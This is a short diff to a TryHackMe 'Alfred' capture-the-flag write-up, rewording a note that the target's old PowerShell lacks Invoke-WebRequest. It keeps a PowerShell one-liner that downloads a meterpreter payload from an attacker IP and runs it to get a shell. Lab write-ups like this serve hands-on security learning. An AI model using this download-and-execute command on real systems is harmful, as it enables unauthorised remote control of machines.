DJShankyShoe/Website/_solutions/TryHackMe/General/ALFRED.md

 ‎

-### However, this machine has a older version of powershell  which didn't support "Invoke-WebRequest" library (alternative to wget).
-Thus, another approach was used to download our meterpreter payload and a meterpreter shell was obtained
+### However, this machine runs on older version of powershell  which does not support `Invoke-WebRequest` library (alternative to wget).
+Thus, another approach was used to download our meterpreter payload to obtain a meterpreter shell
 ```
 powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.21.149/shell.exe','shell.exe')" && shell.exe
 ```